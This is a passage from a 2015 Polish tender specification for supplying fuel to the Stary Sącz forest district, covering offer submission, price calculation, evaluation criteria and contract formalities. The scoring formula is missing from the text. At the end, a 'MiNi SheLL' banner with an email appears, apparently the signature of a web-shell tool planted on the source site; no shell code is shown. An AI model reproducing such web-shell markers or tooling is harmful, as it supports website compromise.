dopiskiem ZAMIANA.9)	Wykonawcy ponoszą wszelkie koszty związane z przygotowaniem i złożeniem oferty.
Miejsce oraz termin składania i otwarcia ofert;
1)	Ofertę sporządzoną w sposób określony w pkt. 10 SIWZ należy złożyć, pocztą lub osobiście, w siedzibie zamawiającego, tj. 33-340 Stary Sącz, ul. Magazynowa 5, pokój nr 11 - do dnia 29 czerwca 2015 roku do godziny 10:00
2)	Wykonawca na żądanie otrzyma pisemne potwierdzenie złożenia oferty.3)	Wykonawca może złożyć tylko jedną ofertę.4)	Oferta złożona lub otrzymana po terminie zostanie zwrócona wykonawcy bez Otwierania.5)	Otwarcie ofert nastąpi dnia 29 czerwca 2015 roku o godzinie 10:15 w siedzibie Zamawiającego w sali narad znajdującej się na parterze budynku.6)	Wykonawcy mogą uczestniczyć w otwarciu ofert. 7)	W przypadku nieobecności Wykonawcy przy otwieraniu ofert, Zamawiający prześle informację z otwarcia ofert, na pisemny wniosek zainteresowanego.
Opis sposobu obliczenia ceny;
1)	Wykonawca wyliczy cenę ofertową wg następującego wzoru                     Cof. = (Cjedn x ĺjedn.) minus (Cjedn x ĺjedn x U%) gdzie:Cof.	 - cena brutto ofertyCjedn 	- cena jednostkowa brutto za 1 litr paliwa obowiązująca na stacji paliw oferenta w dniu ukazania się ogłoszenia w Portalu UZP.ĺjedn. 	- przewidywana wielkość dostawy.U% 	- upust, jaki Zamawiający będzie otrzymywał w stosunku do cen jednostkowych paliw obowiązujących w chwili tankowania na stacji paliwowej.Ceny brutto należy podać dla danego asortymentu:2)	Cenę ofertową należy podać w walucie polskiej (z dokładnością do dwóch miejsc po przecinku) wypełniając formularz cenowy oferty (załącznik nr 1 do SIWZ).3)	Cena ofertowa winna obejmować wszystkie koszty i składniki związane z wykonaniem zamówienia i uwzględniać cały zakres przedmiotu zamówienia.4)	Cena podawana w formularzu ofertowym powinna zostać podana w kwocie brutto, tzn. z uwzględnieniem w niej podatku od towarów i usług (VAT) w obowiązującej stawce na dzień składania ofert.5)	Wprowadzenie przez Wykonawcę zmian w ilościach przedmiotu zamówienia określonych przez Zamawiającego w poszczególnych pozycjach formularza cenowego będzie traktowane jako niezgodność oferty z przedmiotem zamówienia i oferta taka zostanie odrzucona, a oferent wykluczony z postępowania.6)Tym samym Zamawiający, w formularzu ofertowym nie dopuszcza:a)	pozycji cenowych na kwotę 0,00 złotych,b)	pozycji cenowych ujemnych tj. na kwotę mniejszą niż 0,00 zł.,c)	pomijania pozycji cenowych (kosztorysowych).1)	Rozliczenia między Zamawiającym, a Wykonawcą będą prowadzone w walucie polskiej (złoty polski - PLN).2)	W odniesieniu do Wykonawców których cena ofertowa jest niższa o 30% od wartości jaką zamawiający przeznaczył na udzielenie zamówienia lub średniej arytmetycznej cen wszystkich złożonych ofert, zamawiający przeprowadzi  urzędu postępowanie wyjaśniające czy złożona oferta nie zawiera rażąco niskiej ceny w stosunku do przedmiotu Zamówienia. W tym celu zamawiający zwróci się o udzielenie wyjaśnień, polegających na złożeniu przez Wykonawców dowodów, dotyczących elementów oferty mających wpływ na wysokość ceny, w szczególności w zakresie: a)	oszczędności metody wykonania zamówienia, wybranych rozwiązań technicznych, wyjątkowo sprzyjających warunków wykonywania zamówienia dostępnych dla wykonawcy, , kosztów pracy, których wartość przyjęta do ustalenia ceny nie może być niższa od minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,b)	pomocy publicznej udzielonej na podstawie odrębnych przepisów,Ponadto Zamawiający zastrzega sobie prawo wezwania wyżej wymienionych w pkt. 12. 8) SIWZ, Wykonawców do przedłożenia - w określonym przez zamawiającego terminie - m.in.:1.	ofert na dostawę (lub dowodów zakupu) dla produktów ujętych w ofercie,2.	europejskich certyfikatów jakości CE dla produktów ujętych w ofercie.3)	Obowiązek wykazania, że oferta nie zawiera rażąco niskiej ceny, spoczywa na wykonawcy.4)	 Zamawiający odrzuca ofertę wykonawcy, który nie złożył wyjaśnień lub jeżeli dokonana ocena wyjaśnień wraz z dostarczonymi dowodami potwierdza, że oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia.
Opis kryteriów, którymi zamawiający będzie się kierował przy wyborze oferty, wraz z podaniem znaczenia tych kryteriów i sposobu oceny ofert;
1)	 Jako kryterium oceny ofert stosowane będą następujące kryteria:a)	Cena ofertowa - stanowiąca 97% oceny ofert, rozumiana jako cena ofertowa ustalona na podstawie formularza ofertowego stanowiącego załącznik nr 1 do SIWZ,b)	Płatność wykonawcy - stanowiące 3% oceny ofert - rozumiane jako oczekiwany przez oferenta termin realizacji płatności za wykonaną dostawę przedmiotu zamówienia - odniesiony do najdłuższego terminu płatności. Przy czym ustala się, że najdłuższy termin płatności wynosi 30 dni. Termin realizacji płatności zostanie ustalony na podstawie formularza ofertowego stanowiącego załącznik nr 1 do SIWZ.2)	Ustala się następujący sposób oceny ofert (wyboru najkorzystniejszej oferty).LP= { }Gdzie:LP - liczba punktów  - najniższa cena ofertowa, - cena ofertowa oferty podlegającej ocenie,  - oczekiwany przez wykonawcę, którego oferta podlega ocenie, termin realizacji płatności (dni),  - maksymalny termin realizacji płatności (dni), spośród wykonawców składających ofertę (nie dłużej niż 30 dni),Informacje o formalnościach, jakie powinny zostać dopełnione po wyborze oferty w celu zawarcia umowy w sprawie zamówienia publicznego;
1)	Niezwłocznie po wyborze najkorzystniejszej oferty zamawiający zawiadomi wykonawców, którzy złożyli oferty, o:a)	wyborze najkorzystniejszej oferty, podając nazwę (firmę) i adres wykonawcy, którego ofertę wybrano i uzasadnienie jej wyboru,b)	wykonawcach, których oferty zostały odrzucone, podając uzasadnienie faktyczne i prawne,c)	wykonawcach, którzy zostali wykluczeni z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne,d)	terminie (określonym zgodnie z art. 94 ustawy PZP) po którego upływie umowa w sprawie zamówienia publicznego może być zawarta.2)	Ogłoszenie zawierające informacje wskazane w pkt 14.1. Zamawiający umieści na stronie internetowej www.starysacz.krakow.lasy.gov.pl oraz na tablicy ogłoszeń w swojej siedzibie.3)	Wykonawca którego oferta została wybrana jako najkorzystniejsza - w ramach weryfikacji oświadczeń zawartych w ofercie - przedłoży do wyznaczonego w sposób określony powyżej w pkt 14.1)d) SIWZ terminu dokumenty potwierdzające spełnienie na dzień złożenie oferty wymogów w zakresie:a)	 dysponowania potencjałem technicznym - tj. stacją paliw, umożliwiająca realizację przedmiotu zamówienia w odległości nie większej niż 5 km od siedziby Nadleśnictwa. b)	sytuacji ekonomicznej i finansowej - tj. przedłożyć dowód potwierdzający ubezpieczenie od odpowiedzialności cywilnej (dalej OC) w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia, w tym od szkód wyrządzonych przez wykonawcę:1.	zamawiającemu - OC na kwotę co najmniej 100 tys. zł.;2.	pracownikom wykonawcy - OC na kwotę co najmniej 100 tys. zł.;3.	osobom trzecim - OC na kwotę co najmniej 100 tys. zł.Z treści przedłożonego dokumentu musi jednoznacznie wynikać, że wykonawca posiada ubezpieczenie OC z w/w. tytułów. W przypadku gdy na przedłożonym dokumencie (polisie) brak takiej informacji, wykonawca zobowiązany jest dołączyć do niego stosowne oświadczenie brokera ubezpieczeniowego, potwierdzające, że przedłożony dokument potwierdza posiadanie OC wykonawcy w w/w. zakresie4)	Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, zażąda:a)	w przypadku warunków, o których mowa w art. 22 ust. 1 pkt 4 ustawy - dokumentów dotyczących sytuacji ekonomicznej i finansowej, określonych w ogłoszeniu o zamówieniu lub w SIWZ;b)	dokumentów dotyczących w szczególności:1.	zakresu dostępnych wykonawcy zasobów innego podmiotu,2.	sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,3.	charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,4.	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.5)	Niedostarczenie - w wyznaczonym (w sposób określony powyżej w pkt 14.1)d) SIWZ) terminie - przez wykonawcę którego oferta została wybrana jako najkorzystniejsza dokumentów określonych powyżej w pkt 14. SIWZ traktowane będzie jako uchylanie się od zawarcia umowy w sprawie zamówienia publicznego. 6)	W sytuacji opisanej powyżej w pkt 14.5) SIWZ zgodnie z art. 94 ust 3 ustawy PZP zamawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert bez przeprowadzania ich ponownego badania i oceny. Po ponownym wyborze najkorzystniejszej oferty zamawiający przed podpisaniem umowy przeprowadzi weryfikację oświadczeń wykonawcy w sposób określony powyżej w pkt 14. SIWZ.7)	Z wykonawcą którego oferta została wybrana jako najkorzystniejsza oraz którego oświadczenia zostały zweryfikowane sposób określony powyżej w pkt 14. 3) - 14.4) SIWZ - Zamawiający zawrze umowę na wykonanie przedmiotu zamówienia w trybie zgodnym z art. 94 ustawy pzp.
Wymagania dotyczące zabezpieczenia należytego wykonania umowy;
W danym postępowaniu wniesienie zabezpieczenie należytego wykonania umowy nie jest wymagane.1)	Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu niniejszego zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez zamawiającego przepisów ustawy Prawo zamówień publicznych, a wobec ogłoszenia o zamówieniu i specyfikacji istotnych warunków zamówienia także organizacjom wpisanym na listę, o której mowa w art. 154 pkt 5 Pzp - przysługują środki ochrony prawne określone w dziale VI Prawa zamówień publicznych, tj. odwołanie wnoszone do Prezesa Krajowej Izby Odwoławczej oraz skarga do sądu. 2)	Terminy wnoszenia odwołań określa art. 182 Pzp.
Adres poczty elektronicznej lub strony internetowej zamawiającego, jeżeli zamawiający dopuszcza porozumiewanie się drogą elektroniczną;
1)	Zamawiający dopuszcza porozumiewanie się drogą elektroniczną - za pośrednictwem poczty elektronicznej pod adresem starysacz@krakow,lasy.gov.pl2)	Wykonawcy proszeni są o podanie na formularzu ofertowym (wypełnionym zgodnie z załącznikiem nr 1 do SIWZ) własnego:a.	adresu poczty elektronicznej,b.	numeru faksu.
Zamawiający nie przewiduje udzielenie zamówień uzupełniających.
Wskazanie przez wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
1)	Zamawiający dopuszcza udział Podwykonawców przy realizacji przedmiotowego zamówienia.2)	Procedurę dopuszczenia podwykonawcy do realizacji zamówienia (w tym m.in. warunki jakie musi spełniać podwykonawca, elementy jakie muszą się znaleźć w umowie pomiędzy wykonawcą a podwykonawcą tryb odsunięcia podwykonawcy od realizacji zamówienia), sposób rozliczania za dostawy objęte podwykonawstwem oraz odpowiedzialność wykonawcy za dostawy wykonywane przy pomocy podwykonawcy określa wzór umowy na realizację zamówienia - stanowiący załącznik nr 3 do niniejszego SIWZ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com